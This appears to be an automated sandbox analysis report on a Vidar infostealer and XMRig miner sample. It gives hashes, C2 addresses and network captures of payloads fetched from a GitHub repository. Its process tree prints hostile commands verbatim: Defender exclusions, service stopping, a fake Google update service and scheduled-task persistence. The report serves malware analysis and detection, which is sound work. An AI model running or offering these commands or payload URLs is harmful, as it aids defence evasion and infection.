Analysis

  • max time kernel
    43s
  • max time network
    48s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20250129-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20250129-enlocale:en-usos:windows10-2004-x64system
  • submitted
    30/01/2025, 19:41 UTC

General

  • Target

    S0FTWARE.exe

  • Size

    17KB

  • MD5

    d3ddf810af8bba4a931f8eaacd9a027b

  • SHA1

    005036f0441ce6b58c8a5aa9d570de55fb48bb42

  • SHA256

    f1ebc79bd06204885ea85fd1a3e64fdf9b4f869b3c4cbfb241622d03b41fa663

  • SHA512

    e81ed3d2c2a9e6784f8a1c9172544a37845b22f94b4e9d4b5fa6e92e0319b1d93413cc3fc9281e55edd18242ff4a81ac43b5e7bf4341d77525c93c8636175390

  • SSDEEP

    384:dBsoiwi/erATTM8r53VzbA7WtylpDoTPao9TimCt2:dcewrltb2pOao9TNCU

Malware Config

Extracted

Family

vidar

C2

https://t.me/m08mbk

https://steamcommunity.com/profiles/76561199820567237

Attributes
  • user_agent

    Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:136.0) Gecko/20100101 Firefox/136.0

Signatures

  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • Vidar family
  • Xmrig family
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • XMRig Miner payload 7 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Creates new service(s) 2 TTPs
  • Downloads MZ/PE file 2 IoCs
  • Drops file in Drivers directory 1 IoCs
  • Stops running service(s) 4 TTPs
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 4 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Power Settings 1 TTPs 8 IoCs

    powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.

  • Drops file in System32 directory 1 IoCs
  • UPX packed file 12 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Launches sc.exe 14 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 6 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Modifies data under HKEY_USERS 46 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 22 IoCs
  • Suspicious use of AdjustPrivilegeToken 12 IoCs
  • Suspicious use of WriteProcessMemory 19 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\S0FTWARE.exe
    "C:\Users\Admin\AppData\Local\Temp\S0FTWARE.exe"
    1⤵
    • Downloads MZ/PE file
    • Checks computer location settings
    • System Location Discovery: System Language Discovery
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:424
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\BubHlOy', 'C:\Users', 'C:\ProgramData'"
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:3260
    • C:\BubHlOy\aWLlYOjPv.exe
      "C:\BubHlOy\aWLlYOjPv.exe"
      2⤵
      • Executes dropped EXE
      • System Location Discovery: System Language Discovery
      PID:3600
    • C:\BubHlOy\PYRepLfq.exe
      "C:\BubHlOy\PYRepLfq.exe"
      2⤵
      • Checks computer location settings
      • Executes dropped EXE
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:4352
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /C schtasks /create /tn MyApp /tr %APPDATA%\service.exe /st 00:00 /du 9999:59 /sc daily /ri 1 /f
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:3860
        • C:\Windows\SysWOW64\schtasks.exe
          schtasks /create /tn MyApp /tr C:\Users\Admin\AppData\Roaming\service.exe /st 00:00 /du 9999:59 /sc daily /ri 1 /f
          4⤵
          • System Location Discovery: System Language Discovery
          • Scheduled Task/Job: Scheduled Task
          PID:2236
    • C:\BubHlOy\AyCRnMXikI.exe
      "C:\BubHlOy\AyCRnMXikI.exe"
      2⤵
      • Drops file in Drivers directory
      • Executes dropped EXE
      • Drops file in System32 directory
      • Suspicious behavior: EnumeratesProcesses
      PID:1728
      • C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
        C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:4892
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1716
        • C:\Windows\system32\wusa.exe
          wusa /uninstall /kb:890830 /quiet /norestart
          4⤵
            PID:2244
        • C:\Windows\system32\sc.exe
          C:\Windows\system32\sc.exe stop UsoSvc
          3⤵
          • Launches sc.exe
          PID:2352
        • C:\Windows\system32\sc.exe
          C:\Windows\system32\sc.exe stop WaaSMedicSvc
          3⤵
          • Launches sc.exe
          PID:5004
        • C:\Windows\system32\sc.exe
          C:\Windows\system32\sc.exe stop wuauserv
          3⤵
          • Launches sc.exe
          PID:1900
        • C:\Windows\system32\sc.exe
          C:\Windows\system32\sc.exe stop bits
          3⤵
          • Launches sc.exe
          PID:716
        • C:\Windows\system32\sc.exe
          C:\Windows\system32\sc.exe stop dosvc
          3⤵
          • Launches sc.exe
          PID:2308
        • C:\Windows\system32\powercfg.exe
          C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
          3⤵
          • Power Settings
          • Suspicious use of AdjustPrivilegeToken
          PID:732
        • C:\Windows\system32\powercfg.exe
          C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
          3⤵
          • Power Settings
          • Suspicious use of AdjustPrivilegeToken
          PID:2256
        • C:\Windows\system32\powercfg.exe
          C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
          3⤵
          • Power Settings
          • Suspicious use of AdjustPrivilegeToken
          PID:3916
        • C:\Windows\system32\powercfg.exe
          C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
          3⤵
          • Power Settings
          • Suspicious use of AdjustPrivilegeToken
          PID:708
        • C:\Windows\system32\sc.exe
          C:\Windows\system32\sc.exe delete "GoogleUpdateTaskMachineK"
          3⤵
          • Launches sc.exe
          PID:4784
        • C:\Windows\system32\sc.exe
          C:\Windows\system32\sc.exe create "GoogleUpdateTaskMachineK" binpath= "C:\ProgramData\GoogleUP\Chrome\Updater.exe" start= "auto"
          3⤵
          • Launches sc.exe
          PID:1132
        • C:\Windows\system32\sc.exe
          C:\Windows\system32\sc.exe stop eventlog
          3⤵
          • Launches sc.exe
          PID:2732
        • C:\Windows\system32\sc.exe
          C:\Windows\system32\sc.exe start "GoogleUpdateTaskMachineK"
          3⤵
          • Launches sc.exe
          PID:4244
    • C:\ProgramData\GoogleUP\Chrome\Updater.exe
      C:\ProgramData\GoogleUP\Chrome\Updater.exe
      1⤵
      • Executes dropped EXE
      • Suspicious behavior: EnumeratesProcesses
      PID:4260
      • C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
        C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
        2⤵
        • Command and Scripting Interpreter: PowerShell
        • Modifies data under HKEY_USERS
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1388
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
        2⤵
          PID:3636
          • C:\Windows\system32\wusa.exe
            wusa /uninstall /kb:890830 /quiet /norestart
            3⤵
              PID:4612
          • C:\Windows\system32\sc.exe
            C:\Windows\system32\sc.exe stop UsoSvc
            2⤵
            • Launches sc.exe
            PID:4596
          • C:\Windows\system32\sc.exe
            C:\Windows\system32\sc.exe stop WaaSMedicSvc
            2⤵
            • Launches sc.exe
            PID:3756
          • C:\Windows\system32\sc.exe
            C:\Windows\system32\sc.exe stop wuauserv
            2⤵
            • Launches sc.exe
            PID:4764
          • C:\Windows\system32\sc.exe
            C:\Windows\system32\sc.exe stop bits
            2⤵
            • Launches sc.exe
            PID:3964
          • C:\Windows\system32\sc.exe
            C:\Windows\system32\sc.exe stop dosvc
            2⤵
            • Launches sc.exe
            PID:3308
          • C:\Windows\system32\powercfg.exe
            C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
            2⤵
            • Power Settings
            PID:4300
          • C:\Windows\system32\powercfg.exe
            C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
            2⤵
            • Power Settings
            PID:2776
          • C:\Windows\system32\powercfg.exe
            C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
            2⤵
            • Power Settings
            PID:4708
          • C:\Windows\system32\powercfg.exe
            C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
            2⤵
            • Power Settings
            PID:2660
          • C:\Windows\system32\conhost.exe
            C:\Windows\system32\conhost.exe
            2⤵
              PID:4312
            • C:\Windows\explorer.exe
              explorer.exe
              2⤵
                PID:3644
            • C:\Users\Admin\AppData\Roaming\service.exe
              C:\Users\Admin\AppData\Roaming\service.exe
              1⤵
                PID:64
                • C:\Windows\SysWOW64\cmd.exe
                  "C:\Windows\System32\cmd.exe" /C schtasks /create /tn MyApp /tr %APPDATA%\service.exe /st 00:00 /du 9999:59 /sc daily /ri 1 /f
                  2⤵
                    PID:1376
                    • C:\Windows\SysWOW64\schtasks.exe
                      schtasks /create /tn MyApp /tr C:\Users\Admin\AppData\Roaming\service.exe /st 00:00 /du 9999:59 /sc daily /ri 1 /f
                      3⤵
                      • Scheduled Task/Job: Scheduled Task
                      PID:1420

                Network

                • flag-us
                  DNS
                  8.8.8.8.in-addr.arpa
                  Remote address:
                  8.8.8.8:53
                  Request
                  8.8.8.8.in-addr.arpa
                  IN PTR
                  Response
                  8.8.8.8.in-addr.arpa
                  IN PTR
                  dnsgoogle
                • flag-us
                  DNS
                  72.32.126.40.in-addr.arpa
                  Remote address:
                  8.8.8.8:53
                  Request
                  72.32.126.40.in-addr.arpa
                  IN PTR
                  Response
                • flag-us
                  DNS
                  11.153.16.2.in-addr.arpa
                  Remote address:
                  8.8.8.8:53
                  Request
                  11.153.16.2.in-addr.arpa
                  IN PTR
                  Response
                  11.153.16.2.in-addr.arpa
                  IN PTR
                  a2-16-153-11deploystaticakamaitechnologiescom
                • flag-us
                  DNS
                  g.bing.com
                  Remote address:
                  8.8.8.8:53
                  Request
                  g.bing.com
                  IN A
                  Response
                  g.bing.com
                  IN CNAME
                  g-bing-com.ax-0001.ax-msedge.net
                  g-bing-com.ax-0001.ax-msedge.net
                  IN CNAME
                  ax-0001.ax-msedge.net
                  ax-0001.ax-msedge.net
                  IN A
                  150.171.27.10
                  ax-0001.ax-msedge.net
                  IN A
                  150.171.28.10
                • flag-us
                  GET
                  https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=ddc8509093024a56937afcf2711fb033&localId=w:CED07D76-568E-F00B-486A-AAD2F0DB624F&deviceId=6896210250710623&anid=
                  Remote address:
                  150.171.27.10:443
                  Request
                  GET /neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=ddc8509093024a56937afcf2711fb033&localId=w:CED07D76-568E-F00B-486A-AAD2F0DB624F&deviceId=6896210250710623&anid= HTTP/2.0
                  host: g.bing.com
                  accept-encoding: gzip, deflate
                  user-agent: WindowsShellClient/9.0.40929.0 (Windows)
                  Response
                  HTTP/2.0 204
                  cache-control: no-cache, must-revalidate
                  pragma: no-cache
                  expires: Fri, 01 Jan 1990 00:00:00 GMT
                  set-cookie: MUID=1EAA5172D49D623132AA44F6D59B636D; domain=.bing.com; expires=Tue, 24-Feb-2026 19:41:16 GMT; path=/; SameSite=None; Secure; Priority=High;
                  strict-transport-security: max-age=31536000; includeSubDomains; preload
                  access-control-allow-origin: *
                  x-cache: CONFIG_NOCACHE
                  accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                  x-msedge-ref: Ref A: 0C96942B18A34EA8ACBE3638D1518D3A Ref B: LON601060108036 Ref C: 2025-01-30T19:41:16Z
                  date: Thu, 30 Jan 2025 19:41:15 GMT
                • flag-us
                  GET
                  https://g.bing.com/neg/0?action=emptycreative&adUnitId=11730597&publisherId=251978541&rid=ddc8509093024a56937afcf2711fb033&localId=w:CED07D76-568E-F00B-486A-AAD2F0DB624F&deviceId=6896210250710623&anid=
                  Remote address:
                  150.171.27.10:443
                  Request
                  GET /neg/0?action=emptycreative&adUnitId=11730597&publisherId=251978541&rid=ddc8509093024a56937afcf2711fb033&localId=w:CED07D76-568E-F00B-486A-AAD2F0DB624F&deviceId=6896210250710623&anid= HTTP/2.0
                  host: g.bing.com
                  accept-encoding: gzip, deflate
                  user-agent: WindowsShellClient/9.0.40929.0 (Windows)
                  cookie: MUID=1EAA5172D49D623132AA44F6D59B636D
                  Response
                  HTTP/2.0 204
                  cache-control: no-cache, must-revalidate
                  pragma: no-cache
                  expires: Fri, 01 Jan 1990 00:00:00 GMT
                  set-cookie: MSPTC=Bnja6igV38AhFFt2ovpW_CTF06RtxtwPC8t6y7YA38E; domain=.bing.com; expires=Tue, 24-Feb-2026 19:41:16 GMT; path=/; Partitioned; secure; SameSite=None
                  strict-transport-security: max-age=31536000; includeSubDomains; preload
                  access-control-allow-origin: *
                  x-cache: CONFIG_NOCACHE
                  accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                  x-msedge-ref: Ref A: 21246F26E2994597855721C125F57CCC Ref B: LON601060108036 Ref C: 2025-01-30T19:41:16Z
                  date: Thu, 30 Jan 2025 19:41:15 GMT
                • flag-us
                  GET
                  https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=ddc8509093024a56937afcf2711fb033&localId=w:CED07D76-568E-F00B-486A-AAD2F0DB624F&deviceId=6896210250710623&anid=
                  Remote address:
                  150.171.27.10:443
                  Request
                  GET /neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=ddc8509093024a56937afcf2711fb033&localId=w:CED07D76-568E-F00B-486A-AAD2F0DB624F&deviceId=6896210250710623&anid= HTTP/2.0
                  host: g.bing.com
                  accept-encoding: gzip, deflate
                  user-agent: WindowsShellClient/9.0.40929.0 (Windows)
                  cookie: MUID=1EAA5172D49D623132AA44F6D59B636D; MSPTC=Bnja6igV38AhFFt2ovpW_CTF06RtxtwPC8t6y7YA38E
                  Response
                  HTTP/2.0 204
                  cache-control: no-cache, must-revalidate
                  pragma: no-cache
                  expires: Fri, 01 Jan 1990 00:00:00 GMT
                  strict-transport-security: max-age=31536000; includeSubDomains; preload
                  access-control-allow-origin: *
                  x-cache: CONFIG_NOCACHE
                  accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                  x-msedge-ref: Ref A: E019041050BB442B88521D5914821DE0 Ref B: LON601060108036 Ref C: 2025-01-30T19:41:16Z
                  date: Thu, 30 Jan 2025 19:41:15 GMT
                • flag-us
                  DNS
                  55.36.223.20.in-addr.arpa
                  Remote address:
                  8.8.8.8:53
                  Request
                  55.36.223.20.in-addr.arpa
                  IN PTR
                  Response
                • flag-us
                  DNS
                  github.com
                  S0FTWARE.exe
                  Remote address:
                  8.8.8.8:53
                  Request
                  github.com
                  IN A
                  Response
                  github.com
                  IN A
                  20.26.156.215
                • flag-gb
                  GET
                  https://github.com/ailojam/aiopef/raw/refs/heads/main/htjyfasedfdth.exe
                  S0FTWARE.exe
                  Remote address:
                  20.26.156.215:443
                  Request
                  GET /ailojam/aiopef/raw/refs/heads/main/htjyfasedfdth.exe HTTP/1.1
                  Host: github.com
                  Connection: Keep-Alive
                  Response
                  HTTP/1.1 302 Found
                  Server: GitHub.com
                  Date: Thu, 30 Jan 2025 19:41:40 GMT
                  Content-Type: text/html; charset=utf-8
                  Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                  Access-Control-Allow-Origin:
                  Location: https://raw.githubusercontent.com/ailojam/aiopef/refs/heads/main/htjyfasedfdth.exe
                  Cache-Control: no-cache
                  Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                  X-Frame-Options: deny
                  X-Content-Type-Options: nosniff
                  X-XSS-Protection: 0
                  Referrer-Policy: no-referrer-when-downgrade
                  Content-Security-Policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.com raw.githubusercontent.com api.github.com github-cloud.s3.amazonaws.com github-production-repository-file-5c1aeb.s3.amazonaws.com github-production-upload-manifest-file-7fdce7.s3.amazonaws.com github-production-user-asset-6210df.s3.amazonaws.com *.rel.tunnels.api.visualstudio.com wss://*.rel.tunnels.api.visualstudio.com objects-origin.githubusercontent.com copilot-proxy.githubusercontent.com proxy.individual.githubcopilot.com proxy.business.githubcopilot.com proxy.enterprise.githubcopilot.com *.actions.githubusercontent.com wss://*.actions.githubusercontent.com productionresultssa0.blob.core.windows.net/ productionresultssa1.blob.core.windows.net/ productionresultssa2.blob.core.windows.net/ productionresultssa3.blob.core.windows.net/ productionresultssa4.blob.core.windows.net/ productionresultssa5.blob.core.windows.net/ productionresultssa6.blob.core.windows.net/ productionresultssa7.blob.core.windows.net/ productionresultssa8.blob.core.windows.net/ productionresultssa9.blob.core.windows.net/ productionresultssa10.blob.core.windows.net/ productionresultssa11.blob.core.windows.net/ productionresultssa12.blob.core.windows.net/ productionresultssa13.blob.core.windows.net/ productionresultssa14.blob.core.windows.net/ productionresultssa15.blob.core.windows.net/ productionresultssa16.blob.core.windows.net/ productionresultssa17.blob.core.windows.net/ productionresultssa18.blob.core.windows.net/ productionresultssa19.blob.core.windows.net/ github-production-repository-image-32fea6.s3.amazonaws.com github-production-release-asset-2e65be.s3.amazonaws.com insights.github.com wss://alive.github.com api.githubcopilot.com api.individual.githubcopilot.com api.business.githubcopilot.com api.enterprise.githubcopilot.com; font-src github.githubassets.com; form-action 'self' github.com gist.github.com copilot-workspace.githubnext.com objects-origin.githubusercontent.com; frame-ancestors 'none'; frame-src viewscreen.githubusercontent.com notebooks.githubusercontent.com; img-src 'self' data: blob: github.githubassets.com media.githubusercontent.com camo.githubusercontent.com identicons.github.com avatars.githubusercontent.com private-avatars.githubusercontent.com github-cloud.s3.amazonaws.com objects.githubusercontent.com secured-user-images.githubusercontent.com/ user-images.githubusercontent.com/ private-user-images.githubusercontent.com opengraph.githubassets.com github-production-user-asset-6210df.s3.amazonaws.com customer-stories-feed.github.com spotlights-feed.github.com objects-origin.githubusercontent.com *.githubusercontent.com; manifest-src 'self'; media-src github.com user-images.githubusercontent.com/ secured-user-images.githubusercontent.com/ private-user-images.githubusercontent.com github-production-user-asset-6210df.s3.amazonaws.com gist.github.com; script-src github.githubassets.com; style-src 'unsafe-inline' github.githubassets.com; upgrade-insecure-requests; worker-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/
                  Content-Length: 0
                  X-GitHub-Request-Id: CA72:37C6E6:2B270:36A8B:679BD5F4
                • flag-gb
                  GET
                  https://github.com/ailojam/aiopef/raw/refs/heads/main/tfhjawdrgh.exe
                  S0FTWARE.exe
                  Remote address:
                  20.26.156.215:443
                  Request
                  GET /ailojam/aiopef/raw/refs/heads/main/tfhjawdrgh.exe HTTP/1.1
                  Host: github.com
                  Response
                  HTTP/1.1 302 Found
                  Server: GitHub.com
                  Date: Thu, 30 Jan 2025 19:41:41 GMT
                  Content-Type: text/html; charset=utf-8
                  Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                  Access-Control-Allow-Origin:
                  Location: https://raw.githubusercontent.com/ailojam/aiopef/refs/heads/main/tfhjawdrgh.exe
                  Cache-Control: no-cache
                  Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                  X-Frame-Options: deny
                  X-Content-Type-Options: nosniff
                  X-XSS-Protection: 0
                  Referrer-Policy: no-referrer-when-downgrade
                  Content-Security-Policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.com raw.githubusercontent.com api.github.com github-cloud.s3.amazonaws.com github-production-repository-file-5c1aeb.s3.amazonaws.com github-production-upload-manifest-file-7fdce7.s3.amazonaws.com github-production-user-asset-6210df.s3.amazonaws.com *.rel.tunnels.api.visualstudio.com wss://*.rel.tunnels.api.visualstudio.com objects-origin.githubusercontent.com copilot-proxy.githubusercontent.com proxy.individual.githubcopilot.com proxy.business.githubcopilot.com proxy.enterprise.githubcopilot.com *.actions.githubusercontent.com wss://*.actions.githubusercontent.com productionresultssa0.blob.core.windows.net/ productionresultssa1.blob.core.windows.net/ productionresultssa2.blob.core.windows.net/ productionresultssa3.blob.core.windows.net/ productionresultssa4.blob.core.windows.net/ productionresultssa5.blob.core.windows.net/ productionresultssa6.blob.core.windows.net/ productionresultssa7.blob.core.windows.net/ productionresultssa8.blob.core.windows.net/ productionresultssa9.blob.core.windows.net/ productionresultssa10.blob.core.windows.net/ productionresultssa11.blob.core.windows.net/ productionresultssa12.blob.core.windows.net/ productionresultssa13.blob.core.windows.net/ productionresultssa14.blob.core.windows.net/ productionresultssa15.blob.core.windows.net/ productionresultssa16.blob.core.windows.net/ productionresultssa17.blob.core.windows.net/ productionresultssa18.blob.core.windows.net/ productionresultssa19.blob.core.windows.net/ github-production-repository-image-32fea6.s3.amazonaws.com github-production-release-asset-2e65be.s3.amazonaws.com insights.github.com wss://alive.github.com api.githubcopilot.com api.individual.githubcopilot.com api.business.githubcopilot.com api.enterprise.githubcopilot.com; font-src github.githubassets.com; form-action 'self' github.com gist.github.com copilot-workspace.githubnext.com objects-origin.githubusercontent.com; frame-ancestors 'none'; frame-src viewscreen.githubusercontent.com notebooks.githubusercontent.com; img-src 'self' data: blob: github.githubassets.com media.githubusercontent.com camo.githubusercontent.com identicons.github.com avatars.githubusercontent.com private-avatars.githubusercontent.com github-cloud.s3.amazonaws.com objects.githubusercontent.com secured-user-images.githubusercontent.com/ user-images.githubusercontent.com/ private-user-images.githubusercontent.com opengraph.githubassets.com github-production-user-asset-6210df.s3.amazonaws.com customer-stories-feed.github.com spotlights-feed.github.com objects-origin.githubusercontent.com *.githubusercontent.com; manifest-src 'self'; media-src github.com user-images.githubusercontent.com/ secured-user-images.githubusercontent.com/ private-user-images.githubusercontent.com github-production-user-asset-6210df.s3.amazonaws.com gist.github.com; script-src github.githubassets.com; style-src 'unsafe-inline' github.githubassets.com; upgrade-insecure-requests; worker-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/
                  Content-Length: 0
                  X-GitHub-Request-Id: CA72:37C6E6:2B303:36B50:679BD5F4
                • flag-gb
                  GET
                  https://github.com/ailojam/aiopef/raw/refs/heads/main/yjsedfawdr.exe
                  S0FTWARE.exe
                  Remote address:
                  20.26.156.215:443
                  Request
                  GET /ailojam/aiopef/raw/refs/heads/main/yjsedfawdr.exe HTTP/1.1
                  Host: github.com
                  Response
                  HTTP/1.1 302 Found
                  Server: GitHub.com
                  Date: Thu, 30 Jan 2025 19:41:42 GMT
                  Content-Type: text/html; charset=utf-8
                  Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                  Access-Control-Allow-Origin:
                  Location: https://raw.githubusercontent.com/ailojam/aiopef/refs/heads/main/yjsedfawdr.exe
                  Cache-Control: no-cache
                  Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                  X-Frame-Options: deny
                  X-Content-Type-Options: nosniff
                  X-XSS-Protection: 0
                  Referrer-Policy: no-referrer-when-downgrade
                  Content-Security-Policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.com raw.githubusercontent.com api.github.com github-cloud.s3.amazonaws.com github-production-repository-file-5c1aeb.s3.amazonaws.com github-production-upload-manifest-file-7fdce7.s3.amazonaws.com github-production-user-asset-6210df.s3.amazonaws.com *.rel.tunnels.api.visualstudio.com wss://*.rel.tunnels.api.visualstudio.com objects-origin.githubusercontent.com copilot-proxy.githubusercontent.com proxy.individual.githubcopilot.com proxy.business.githubcopilot.com proxy.enterprise.githubcopilot.com *.actions.githubusercontent.com wss://*.actions.githubusercontent.com productionresultssa0.blob.core.windows.net/ productionresultssa1.blob.core.windows.net/ productionresultssa2.blob.core.windows.net/ productionresultssa3.blob.core.windows.net/ productionresultssa4.blob.core.windows.net/ productionresultssa5.blob.core.windows.net/ productionresultssa6.blob.core.windows.net/ productionresultssa7.blob.core.windows.net/ productionresultssa8.blob.core.windows.net/ productionresultssa9.blob.core.windows.net/ productionresultssa10.blob.core.windows.net/ productionresultssa11.blob.core.windows.net/ productionresultssa12.blob.core.windows.net/ productionresultssa13.blob.core.windows.net/ productionresultssa14.blob.core.windows.net/ productionresultssa15.blob.core.windows.net/ productionresultssa16.blob.core.windows.net/ productionresultssa17.blob.core.windows.net/ productionresultssa18.blob.core.windows.net/ productionresultssa19.blob.core.windows.net/ github-production-repository-image-32fea6.s3.amazonaws.com github-production-release-asset-2e65be.s3.amazonaws.com insights.github.com wss://alive.github.com api.githubcopilot.com api.individual.githubcopilot.com api.business.githubcopilot.com api.enterprise.githubcopilot.com; font-src github.githubassets.com; form-action 'self' github.com gist.github.com copilot-workspace.githubnext.com objects-origin.githubusercontent.com; frame-ancestors 'none'; frame-src viewscreen.githubusercontent.com notebooks.githubusercontent.com; img-src 'self' data: blob: github.githubassets.com media.githubusercontent.com camo.githubusercontent.com identicons.github.com avatars.githubusercontent.com private-avatars.githubusercontent.com github-cloud.s3.amazonaws.com objects.githubusercontent.com secured-user-images.githubusercontent.com/ user-images.githubusercontent.com/ private-user-images.githubusercontent.com opengraph.githubassets.com github-production-user-asset-6210df.s3.amazonaws.com customer-stories-feed.github.com spotlights-feed.github.com objects-origin.githubusercontent.com *.githubusercontent.com; manifest-src 'self'; media-src github.com user-images.githubusercontent.com/ secured-user-images.githubusercontent.com/ private-user-images.githubusercontent.com github-production-user-asset-6210df.s3.amazonaws.com gist.github.com; script-src github.githubassets.com; style-src 'unsafe-inline' github.githubassets.com; upgrade-insecure-requests; worker-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/
                  Content-Length: 0
                  X-GitHub-Request-Id: CA72:37C6E6:2B35B:36BB6:679BD5F5
                • flag-us
                  DNS
                  raw.githubusercontent.com
                  S0FTWARE.exe
                  Remote address:
                  8.8.8.8:53
                  Request
                  raw.githubusercontent.com
                  IN A
                  Response
                  raw.githubusercontent.com
                  IN A
                  185.199.109.133
                  raw.githubusercontent.com
                  IN A
                  185.199.108.133
                  raw.githubusercontent.com
                  IN A
                  185.199.111.133
                  raw.githubusercontent.com
                  IN A
                  185.199.110.133
                • flag-us
                  GET
                  https://raw.githubusercontent.com/ailojam/aiopef/refs/heads/main/htjyfasedfdth.exe
                  S0FTWARE.exe
                  Remote address:
                  185.199.109.133:443
                  Request
                  GET /ailojam/aiopef/refs/heads/main/htjyfasedfdth.exe HTTP/1.1
                  Host: raw.githubusercontent.com
                  Connection: Keep-Alive
                  Response
                  HTTP/1.1 200 OK
                  Connection: keep-alive
                  Content-Length: 279040
                  Cache-Control: max-age=300
                  Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                  Content-Type: application/octet-stream
                  ETag: "ae41f919dc8e301092a9048ee726d26f3f17f1e8b85b024dba2d087c4425492f"
                  Strict-Transport-Security: max-age=31536000
                  X-Content-Type-Options: nosniff
                  X-Frame-Options: deny
                  X-XSS-Protection: 1; mode=block
                  X-GitHub-Request-Id: 38DD:1F849D:2F4BAB:40620E:679BCF80
                  Accept-Ranges: bytes
                  Date: Thu, 30 Jan 2025 19:41:40 GMT
                  Via: 1.1 varnish
                  X-Served-By: cache-lcy-eglc8600091-LCY
                  X-Cache: HIT
                  X-Cache-Hits: 0
                  X-Timer: S1738266101.538614,VS0,VE142
